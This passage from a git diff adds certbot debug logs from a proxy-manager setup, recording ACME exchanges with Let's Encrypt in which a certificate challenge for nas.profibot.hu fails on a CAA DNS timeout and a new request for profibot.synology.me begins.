"eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRWNDTnBCckNSeWJycG9ZWFpta09RbVJRdmpoRzR5OFdwV1ZFZ2dKUG5nUEEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "indPjcD1AXKEGkCZQ8JnpY9vOUh1x6nacRveV2_ERjHoLZrTOs9wKf1GHSJW3ZpKauM-3IIv4K7QuKZ2GG394fHnLZPFpHcgDV_cONY_T9WtLsosTNznnUDBncKDQP2DxLbC_Rx6Pjq4Qiu--GfrjcEDfKjgPbpQIHG6DLN_D7IBjhP3mZo_QSDtS68QboYLzjPlJTI-YBGirqWLDwWJDgvYk37p0eEO0MqCe-Pxcta0siPQFFNBaTJ9yv6dusOGBQ_72M-GJg7cdS8sW3BOfPrTo0NITyIcizKThpF78KzhcTyVtHTzTKjO5UdOjgXiImuQRnvnv3ScUb3yAjNo9w", + "payload": "" +} +2025-12-25 04:05:57,932:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:57,933:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:57 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEBC03u2bwZZSUqvg-VYEuUU8VpzHWa5UjOgBw2x7kDHA +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:57,934:DEBUG:acme.client:Storing nonce: 58tS3qjEBC03u2bwZZSUqvg-VYEuUU8VpzHWa5UjOgBw2x7kDHA +2025-12-25 04:05:57,934:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:06:00,935:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:06:00,939:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRUJDMDN1MmJ3WlpTVXF2Zy1WWUV1VVU4VnB6SFdhNVVqT2dCdzJ4N2tESEEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "I6IakRlly2r0N2wLLFgXFUk_9EJmWSWdXPDdZHADNJ8ItCZ86tO2cZKj-UG2QckKL6r3JlVc1OkzDM4Mh9ipOwS90XLzDC6vC2kXS8PfyJmRtoTbY8lZ40nt22w21gAhNddcZlEEoz9z491jZRFQrCV723Z04kFqfYsml1kBUR7z2Ye3Znf1VyuVFTS3LzKsrms-npziC1KgbNq5-f1fMLTTy0thuE1UtkzynTGlzgRLfm26o8Xz7YqibJS3dHNu2YHzTlCMgcYY2DIPtDLKu4z4yN3RtwSFBXjukou0AMdqVD408-n42--yWdLmqVA82Y6aN1h_FGLYGklAf1wwoQ", + "payload": "" +} +2025-12-25 04:06:01,095:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:06:01,096:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:06:01 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJn9vcB-GOS7Y58U9J925rSOixyOKlmCH47qhjQEwdrC8 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:06:01,097:DEBUG:acme.client:Storing nonce: fULB7aUJn9vcB-GOS7Y58U9J925rSOixyOKlmCH47qhjQEwdrC8 +2025-12-25 04:06:01,097:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:06:04,098:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:06:04,102:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSm45dmNCLUdPUzdZNThVOUo5MjVyU09peHlPS2xtQ0g0N3FoalFFd2RyQzgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "NqDa5NIyqmgkCqM9fcvyIdjDGzKDang-ULLNeGMNUq0tr8BfHCwF5-3CYoduTfPl6FtYNBgJFLZ3v-BPOXk6_cnEPFyeilmgtZTpJ-oyhXHwdSz2y_NtiA6wosjf-AVdb90gHdmYg1ZmmE5B-m47aQAReZnHbWjt3122Cv-tqAk2kFQjvZnodjsJ2zW5-ihU2nZ1Ki4qPj3o1KsEK7Uqc4oSWMmhTZLgMxcGjhyCiGMTitDLiuilvRZtbqinr8gxZUR15oh1BrUeQyaTuZfsmyP8bF-ihg09O4dQiwOCz0ABuub10R1zeByq-edkVIKc-8avVCGyVx_mmZDmyy3kMw", + "payload": "" +} +2025-12-25 04:06:04,258:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:06:04,259:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:06:04 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEyqdPeuMJvoEgDrzW4fW6Go2kUgmv5tXqnlP-nU0Fu5o +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:06:04,259:DEBUG:acme.client:Storing nonce: 58tS3qjEyqdPeuMJvoEgDrzW4fW6Go2kUgmv5tXqnlP-nU0Fu5o +2025-12-25 04:06:04,260:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:06:07,261:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:06:07,266:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRXlxZFBldU1Kdm9FZ0Ryelc0Zlc2R28ya1VnbXY1dFhxbmxQLW5VMEZ1NW8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "IV30Wot9sRQDSeMtNhSbmLYSoqvccofXmjz5WsQakYpPxsbOW_bExRK9Ys9KV02ekU4T2K1anBJynGkgIMCs_p0RVWRMbWq4Mb4b3g5W4WUOrrt4wdmKNP8q5FVyprahCe-QihlGlp0glBtb8KogEzfW3jtsEpAlu6YDmbhSVJ5TVqJMHGpGfspcuDSvAvcmPLsbr7tF_iyTN4981A9Z9tQftCgQlhFDw0sRvciT8m0F51A0xzOD6HcreHr6rCdV4Vdlo_bT3WOCyPXQ5zBnldeSOAE_fByoNHTEQ_W3x08AzXNsbEyACpPnyyPcZfX9XBEmI0fWiRiDA_Uay9EBIA", + "payload": "" +} +2025-12-25 04:06:07,421:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 1028 +2025-12-25 04:06:07,422:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:06:07 GMT +Content-Type: application/json +Content-Length: 1028 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEzTvgt_IbI5YQTLjTMT_48XhhwUEsVFFsZgMuNR_y6vo +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "invalid", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "invalid", + "validated": "2025-12-25T04:04:34Z", + "error": { + "type": "urn:ietf:params:acme:error:dns", + "detail": "During secondary validation: While processing CAA for nas.profibot.hu: DNS problem: query timed out looking up CAA for nas.profibot.hu", + "status": 400 + }, + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA", + "validationRecord": [ + { + "url": "http://nas.profibot.hu/.well-known/acme-challenge/IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA", + "hostname": "nas.profibot.hu", + "port": "80", + "addressesResolved": [ + "92.249.165.228" + ], + "addressUsed": "92.249.165.228" + } + ] + } + ] +} +2025-12-25 04:06:07,422:DEBUG:acme.client:Storing nonce: 58tS3qjEzTvgt_IbI5YQTLjTMT_48XhhwUEsVFFsZgMuNR_y6vo +2025-12-25 04:06:07,422:INFO:certbot._internal.auth_handler:Challenge failed for domain nas.profibot.hu +2025-12-25 04:06:07,423:INFO:certbot._internal.auth_handler:http-01 challenge for nas.profibot.hu +2025-12-25 04:06:07,423:DEBUG:certbot._internal.display.obj:Notifying user: +Certbot failed to authenticate some domains (authenticator: webroot). The Certificate Authority reported these problems: + Domain: nas.profibot.hu + Type: dns + Detail: During secondary validation: While processing CAA for nas.profibot.hu: DNS problem: query timed out looking up CAA for nas.profibot.hu + +Hint: The Certificate Authority failed to download the temporary challenge files created by Certbot. Ensure that the listed domains serve their content from the provided --webroot-path/-w and that files created there can be downloaded from the internet. + +2025-12-25 04:06:07,424:DEBUG:certbot._internal.error_handler:Encountered exception: +Traceback (most recent call last): + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations + self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort) + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations + raise errors.AuthorizationError('Some challenges have failed.') +certbot.errors.AuthorizationError: Some challenges have failed. + +2025-12-25 04:06:07,424:DEBUG:certbot._internal.error_handler:Calling registered functions +2025-12-25 04:06:07,425:INFO:certbot._internal.auth_handler:Cleaning up challenges +2025-12-25 04:06:07,425:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA +2025-12-25 04:06:07,425:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up +2025-12-25 04:06:07,426:DEBUG:certbot._internal.log:Exiting abnormally: +Traceback (most recent call last): + File "/opt/certbot/bin/certbot", line 7, in + sys.exit(main()) + ^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/main.py", line 18, in main + return internal_main.main(cli_args) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1850, in main + return config.func(config, plugins) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1562, in certonly + lineage = _get_and_save_cert(le_client, config, domains, certname, lineage) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 141, in _get_and_save_cert + lineage = le_client.obtain_and_enroll_certificate(domains, certname) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 526, in obtain_and_enroll_certificate + cert, chain, key, _ = self.obtain_certificate(domains) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 427, in obtain_certificate + orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 505, in _get_order_and_authorizations + authzr = self.auth_handler.handle_authorizations(orderr, self.config, best_effort) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations + self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort) + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations + raise errors.AuthorizationError('Some challenges have failed.') +certbot.errors.AuthorizationError: Some challenges have failed. +2025-12-25 04:06:07,431:ERROR:certbot._internal.log:Some challenges have failed. diff --git a/proxy-manager/data/logs/letsencrypt.log.8 b/proxy-manager/data/logs/letsencrypt.log.8 new file mode 100755 index 0000000..b2594df --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.8 @@ -0,0 +1,555 @@ +2025-12-25 00:45:14,732:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2025-12-25 00:45:14,732:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2025-12-25 00:45:14,732:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-11', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'profibot.synology.me'] +2025-12-25 00:45:14,732:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2025-12-25 00:45:14,742:DEBUG:certbot._internal.log:Root logging level set at 30 +2025-12-25 00:45:14,742:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 00:45:14,742:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2025-12-25 00:45:14,743:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2025-12-25 00:45:14,743:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2025-12-25 00:45:14,780:DEBUG:certbot._internal.main:Picked account: +2025-12-25 00:45:14,780:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2025-12-25 00:45:14,781:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2025-12-25 00:45:15,252:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2025-12-25 00:45:15,253:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:45:15 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "BrbMn-lKfIw": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2025-12-25 00:45:15,254:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for profibot.synology.me +2025-12-25 00:45:15,260:DEBUG:acme.client:Requesting fresh nonce +2025-12-25 00:45:15,260:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2025-12-25 00:45:15,414:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2025-12-25 00:45:15,415:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:45:15 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEu8GVqPMnRBR0liVI7vS839AAzsgnCdFlQtNkVV14mVg +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2025-12-25 00:45:15,416:DEBUG:acme.client:Storing nonce: 58tS3qjEu8GVqPMnRBR0liVI7vS839AAzsgnCdFlQtNkVV14mVg +2025-12-25 00:45:15,416:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "profibot.synology.me"\n }\n ]\n}' +2025-12-25 00:45:15,420:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRXU4R1ZxUE1uUkJSMGxpVkk3dlM4MzlBQXpzZ25DZEZsUXROa1ZWMTRtVmciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "lfN2Nri5e2alt2EwCpf1t-BucjemrkN-W3ycrCYke_Jac78O2PCekyHV0pIAnj3NvKpKQh4j5HpjRODuvUc52_oXxk_vG2m1brsQ8oyfki8wIznSk3JKH10VguFYXcZ0wWmUgdU6nSEiTdDK-gE31E3ZZqXe61RMohwMaf5tBmu_66JVW2SowHcy-oxDkzlfEgH4V5XrCwIDEqzFs8YAkBCT9uEaAdFFX9mYucaHjn-FJyoS70TRCYHqEGQaXzxtnio4zFq5aWosBDvKQme7-vMg_up6esvcG_Z6K6MboLukZNnm9PHfYjpPKuQ-KX4bIMN2ykcasfG28SGGS6bi2w", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogInByb2ZpYm90LnN5bm9sb2d5Lm1lIgogICAgfQogIF0KfQ" +} +2025-12-25 00:45:15,600:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 354 +2025-12-25 00:45:15,601:DEBUG:acme.client:Received response: +HTTP 201 +Server: nginx +Date: Thu, 25 Dec 2025 00:45:15 GMT +Content-Type: application/json +Content-Length: 354 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462377721906 +Replay-Nonce: 58tS3qjE9cT3jE41w3X4vTpAyQzO2Nx6SIuatmuTbgOMPy6w6tE +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "pending", + "expires": "2026-01-01T00:45:15Z", + "identifiers": [ + { + "type": "dns", + "value": "profibot.synology.me" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632593074936" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462377721906" +} +2025-12-25 00:45:15,601:DEBUG:acme.client:Storing nonce: 58tS3qjE9cT3jE41w3X4vTpAyQzO2Nx6SIuatmuTbgOMPy6w6tE +2025-12-25 00:45:15,602:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 00:45:15,606:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632593074936: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRTljVDNqRTQxdzNYNHZUcEF5UXpPMk54NlNJdWF0bXVUYmdPTVB5Nnc2dEUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTkzMDc0OTM2In0", + "signature": "i-KlMnAZBK5emucU8XT-QCGkqmI9XmMYuNKyx-XwBJEUM2hAHIbugbshRgiovDewiKnTaSrPZ_dVIqLoQGIWeOcGRNmINGVj_KQtl1-GNWNx97EiqgOx2g6WJn1hWFJ3jzcfkVqkorSJia-HitciCck6-QXz4RIa3V5vMLn8WavaVu5-RoMuxNHh27zdYacAoMjkyLjGIBULH7BZWcl26sZJ7hcb76CorOOF3DHppL3JMaxwat7HtyYXfrotGcSEqhgLKE30JEcKjkridXqRMuZ0t_Snyc7SAHsd7mNL8EExGjWeNT58jdgLB4b9nJkRpVtnF8BF4_tkF7as_XS-Gg", + "payload": "" +} +2025-12-25 00:45:15,763:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632593074936 HTTP/1.1" 200 828 +2025-12-25 00:45:15,764:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:45:15 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEeppAj6GjPVSORgmYjtxTOnnBIbTfo6_bLmpOhrifsxA +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "profibot.synology.me" + }, + "status": "pending", + "expires": "2026-01-01T00:45:15Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632593074936/7ckjww", + "status": "pending", + "token": "3p0V9lXhAarnKZPWlIMssUq9-LRtuHeqJw1pKt2nm_0" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632593074936/hh1ZKg", + "status": "pending", + "token": "3p0V9lXhAarnKZPWlIMssUq9-LRtuHeqJw1pKt2nm_0" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632593074936/F-gr-Q", + "status": "pending", + "token": "3p0V9lXhAarnKZPWlIMssUq9-LRtuHeqJw1pKt2nm_0" + } + ] +} +2025-12-25 00:45:15,765:DEBUG:acme.client:Storing nonce: 58tS3qjEeppAj6GjPVSORgmYjtxTOnnBIbTfo6_bLmpOhrifsxA +2025-12-25 00:45:15,765:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632593074936/F-gr-Q', 'status': 'pending', 'token': '3p0V9lXhAarnKZPWlIMssUq9-LRtuHeqJw1pKt2nm_0'} +2025-12-25 00:45:15,766:INFO:certbot._internal.auth_handler:Performing the following challenges: +2025-12-25 00:45:15,766:INFO:certbot._internal.auth_handler:http-01 challenge for profibot.synology.me +2025-12-25 00:45:15,767:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. +2025-12-25 00:45:15,767:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge +2025-12-25 00:45:15,769:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/3p0V9lXhAarnKZPWlIMssUq9-LRtuHeqJw1pKt2nm_0 +2025-12-25 00:45:15,770:DEBUG:acme.client:JWS payload: +b'{}' +2025-12-25 00:45:15,774:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632593074936/7ckjww: +{ + "protected": 